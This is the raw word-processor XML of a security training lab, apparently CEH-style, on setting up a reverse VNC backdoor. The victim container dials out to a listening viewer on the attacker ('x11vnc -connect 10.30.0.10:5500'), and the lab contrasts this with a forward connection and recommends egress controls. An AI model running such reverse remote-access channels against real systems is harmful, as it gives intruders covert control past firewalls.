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9B677E" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000" w:rsidP="009C33B5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6FDDF010" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000" w:rsidP="009C33B5">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>TCL 16 — How to Set Up a Reverse VNC Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304F84DC" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000" w:rsidP="009C33B5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4DEB3617" w14:textId="77777777" w:rsidR="009C33B5" w:rsidRDefault="009C33B5" w:rsidP="009C33B5">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78DC1CF4" w14:textId="77777777" w:rsidR="009C33B5" w:rsidRDefault="009C33B5" w:rsidP="009C33B5">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75A8A6BD" w14:textId="77777777" w:rsidR="00A50AA4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6211910D" w14:textId="77777777" w:rsidR="00A50AA4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16 focuses on: contrasting a forward VNC connection with a reverse (outbound-initiated) VNC backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F68B3E" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B48BC77" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a VNC server on the victim and connect to it the normal (forward) way from the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4072ED22" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Explain why an inbound-blocking firewall would stop that forward connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14000B45" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a listening VNC viewer on the attacker and initiate a reverse connection from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD0857" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Contrast the forward and reverse connections and recommend egress controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5ED3D" w14:textId="77777777" w:rsidR="00A50AA4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A50AA4" w14:paraId="3E529046" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="4B9B0BC2" w14:textId="77777777" w:rsidR="00A50AA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161F0013" w14:textId="77777777" w:rsidR="00A50AA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A50AA4" w14:paraId="76E90C09" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0075B030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TightVNC / vncserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DF4E459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Serving a remote desktop session — CEH “Trojans and Other Attacks” domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A50AA4" w14:paraId="76A2DF05" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="657FBB8A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vncviewer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="704A8A27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Connecting to (and listening for) VNC sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A50AA4" w14:paraId="1777DD52" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6152AF63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x11vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C1F4A72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Initiating the outbound reverse connection from the inside host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C724776" w14:textId="77777777" w:rsidR="00A50AA4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772C6E4D" w14:textId="77777777" w:rsidR="00A50AA4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A50AA4" w14:paraId="29A66A39" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="7E908A83" w14:textId="77777777" w:rsidR="00A50AA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0A1EBE40" w14:textId="77777777" w:rsidR="00A50AA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58755E10" w14:textId="77777777" w:rsidR="00A50AA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A50AA4" w14:paraId="58C6CE8C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7045E173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43E6E353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0BABCC3C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Reverse remote-access channels are a core persistence and command-and-control technique; being able to demonstrate one is how this role justifies egress filtering and outbound monitoring to a client.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DEEA5E7" w14:textId="77777777" w:rsidR="00A50AA4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A50AA4" w14:paraId="50A219D7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="275F6EFA" w14:textId="77777777" w:rsidR="00A50AA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1331416B" w14:textId="77777777" w:rsidR="00A50AA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63A75C1E" w14:textId="77777777" w:rsidR="00A50AA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2685D838" w14:textId="77777777" w:rsidR="00A50AA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77C4B6B4" w14:textId="77777777" w:rsidR="00A50AA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A50AA4" w14:paraId="559F9DB4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75C63015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4F2F93CF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(all Kali tools)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F46418A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10.30.0.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="754D4710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(kali-rolling)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30AC1B49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  <w:tr w:rsidR="00A50AA4" w14:paraId="14834B31" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6771E897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victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17F4DFC5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Vulnerable Linux victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28394629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10.30.0.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38455236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Metasploitable 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566FA7C0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msfadmin / msfadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0BE8537F" w14:textId="77777777" w:rsidR="00A50AA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2C24A7" wp14:editId="5C87060A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E78E" w14:textId="77777777" w:rsidR="00A50AA4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77DB2A2B" w14:textId="77777777" w:rsidR="00A50AA4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2DEDAFEE" w14:textId="77777777" w:rsidR="00A50AA4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1282FE21" w14:textId="77777777" w:rsidR="00A50AA4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465BE219" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a VNC server on the victim and connect to it the normal (forward) way from the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFDB611" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Explain why an inbound-blocking firewall would stop that forward connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E93FA" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Start a listening VNC viewer on the attacker and initiate a reverse connection from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BFA395" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Contrast the forward and reverse connections and recommend egress controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F342BA" w14:textId="77777777" w:rsidR="00A50AA4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A50AA4" w14:paraId="50D91E5B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE9E4"/>
          </w:tcPr>
          <w:p w14:paraId="6953AADE" w14:textId="77777777" w:rsidR="00A50AA4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49CEE38F" w14:textId="77777777" w:rsidR="00A50AA4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“You showed the file channel with Netcat,” Nadia says. “Now show the interactive one. If an attacker wants Victor's actual desktop, an inbound firewall won't stop them — because the compromised machine will reach out, not in.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20FCC7C8" w14:textId="77777777" w:rsidR="00A50AA4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wants the contrast made explicit. “Do it the obvious way first. Then flip it — have the inside host dial out to your listener — and explain why the same firewall that would block the first waves the second through. That side-by-side is the finding.”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C890D8A" w14:textId="77777777" w:rsidR="00A50AA4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 xml:space="preserve">Your task: connect to a VNC server the normal way, then establish a reverse VNC connection from the victim out </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>to a listener on the attacker container.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="346E5DE1" w14:textId="77777777" w:rsidR="00A50AA4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09144BE5" w14:textId="77777777" w:rsidR="00A50AA4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6AB04AC8" w14:textId="77777777" w:rsidR="00A50AA4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0831DC83" w14:textId="77777777" w:rsidR="00A50AA4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7BE538BF" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. On the victim, start a VNC server. (Range note: install tightvncserver/x11vnc on the victim if absent.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEE934" w14:textId="77777777" w:rsidR="00A50AA4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docker exec -it victim vncserver :2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05466E" w14:textId="77777777" w:rsidR="00A50AA4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docker exec -it victim vncserver -list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6BE24B" w14:textId="77777777" w:rsidR="00A50AA4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 server on display :2 (port 5902).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D54C82" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>2. From the RDP desktop, connect the normal (forward) way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4FB55" w14:textId="77777777" w:rsidR="00A50AA4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vncviewer 10.30.0.30:5902</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8AB922" w14:textId="77777777" w:rsidR="00A50AA4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victim's desktop — this is what an inbound firewall would block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED0B3E" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. Stop that server; start a listening viewer on the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D524B6" w14:textId="77777777" w:rsidR="00A50AA4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vncviewer -listen 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE3620" w14:textId="77777777" w:rsidR="00A50AA4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attacker waiting for an incoming connection (port 5500).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9F6BED" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. From the victim, dial out to the attacker's listener (reverse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC3823" w14:textId="77777777" w:rsidR="00A50AA4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docker exec -it victim x11vnc -connect 10.30.0.10:5500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39029D23" w14:textId="77777777" w:rsidR="00A50AA4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session appearing on the attacker — the victim called out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34531C4F" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. Confirm the reverse session is live.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371DF4F" w14:textId="77777777" w:rsidR="00A50AA4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victim's screen on your listening viewer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7290C704" w14:textId="77777777" w:rsidR="00A50AA4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Explain why the reverse connection succeeds where the forward one would be blocked, and name the control that detects it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372FE541" w14:textId="77777777" w:rsidR="00A50AA4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437AD1BE" w14:textId="77777777" w:rsidR="00A50AA4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59CD4BC6" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. Range note: the victim container needs a VNC server and x11vnc; if they are not already installed, add tightvncserver and x11vnc to the victim image first. All steps stay inside cyberlab_net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E0DE65" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>2. On the victim host (docker exec -it victim bash, become root), start a VNC server on a display (for example, :2) and list the running servers to confirm the port it opened (5900 + display number).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C09F02" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. On the attacker container, launch a VNC viewer and connect to the victim server on that display's port, authenticating when prompted, to confirm normal remote control works within the range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0F327" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. Reason about the firewall: if the victim were behind an inbound-blocking firewall, this forward connection would fail. Note why.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D20CB" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. Stop the victim VNC server for the display you started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFEEBA" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. On the attacker, start the VNC viewer in listen mode so it waits for an incoming (reverse) connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70762D62" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>7. On the victim, initiate an outbound reverse connection back to the attacker's listener (x11vnc's -connect option pointing at the attacker address 10.30.0.10 and the listener port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B80450" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>8. On the attacker, confirm the reverse session appears — the victim inside connected out to you — and write down why inbound firewall rules never saw it coming.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A50AA4" w14:paraId="32D400DA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEE7F1"/>
          </w:tcPr>
          <w:p w14:paraId="2E8A2058" w14:textId="77777777" w:rsidR="00A50AA4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04079B0D" w14:textId="77777777" w:rsidR="00A50AA4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A VNC display maps to a port: display :2 listens on 5902. vncserver -list shows what's running. Forward: vncviewer &lt;host&gt;:&lt;port&gt;. The viewer must be able to reach the server — that's what an inbound firewall blocks. Reverse: start the viewer with vncviewer -listen 0, then have the inside host connect out to it. From the victim, x11vnc -connect 10.30.0.10:5500 dials the waiting viewer — the connection originates inside. The firewall inspects who initiates the connection, not what it carries — an outbound-initiated session looks like ordinary egress.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A317318" w14:textId="77777777" w:rsidR="00A50AA4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26190AEB" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Contrast forward and reverse remote access. Get an interactive session the inbound firewall wouldn't allow.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A50AA4" w14:paraId="24592249" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="29C49521" w14:textId="77777777" w:rsidR="00A50AA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7599D436" w14:textId="77777777" w:rsidR="00A50AA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296F0D2C" w14:textId="77777777" w:rsidR="00A50AA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A50AA4" w14:paraId="459B41E5" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A850112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2B86CC02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6D4D329A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TCP port that display :2 listens on.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A50AA4" w14:paraId="2089B660" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="703BC315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3FB7F51D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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F433660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Which connection direction a default firewall permits, and why.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A50AA4" w14:paraId="73877936" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E264EE0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7EACC495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44FE86D5" w14:textId="77777777" w:rsidR="00A50AA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egress control a defender should add.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F41F2AC" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Total: 40 points. Submit each flag's value with one screenshot showing how you captured it. Any tool or method is allowed — but every target stays inside the 10.30.0.0/24 range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10077319" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00A50AA4">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08D74BEB" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468834F0" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Forward and reverse are the whole lesson. A forward connection asks the firewall to let a stranger in, and a decent firewall says no. A reverse connection has the inside machine place the call, and to the firewall that's just an employee's computer reaching out — indistinguishable, at the packet level, from normal browsing. This is why nearly every real backdoor is outbound-initiated, and why defense shifts to egress filtering, application allow-listing, and watching for unexpected outbound sessions rather than trusting the inbound wall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263A85C" w14:textId="77777777" w:rsidR="00A50AA4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743ED511" w14:textId="77777777" w:rsidR="00A50AA4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2980F2ED" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of the victim VNC server running (with its port) and the forward vncviewer session from the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F42A6A" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of the attacker viewer in listen mode waiting for a reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C06CF" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of the established reverse VNC session on the attacker, initiated from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E3F63" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• A brief report contrasting the forward and reverse connections and recommending the egress controls a defender should add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482B379" w14:textId="77777777" w:rsidR="00A50AA4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lab16.txt , then last -n 10 &gt;&gt; lab16.txt , then  cat lab16.txt  — screenshot the output of that final cat command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C0232" w14:textId="77777777" w:rsidR="00A50AA4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645D1ED0" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Up to five curated resources for this lab, including video walkthroughs where useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63740BEB" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• TightVNC documentation (official)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA27F6" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• x11vnc manual (official)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBF04C" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• MITRE ATT&amp;CK — Remote Services: VNC (T1021.005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489E44B0" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• MITRE ATT&amp;CK — Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABDECCD" w14:textId="77777777" w:rsidR="00A50AA4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• [Video] Reverse Connections &amp; Firewall Evasion (conceptual)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A50AA4" w14:paraId="41CE25B9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4E3CC"/>
          </w:tcPr>
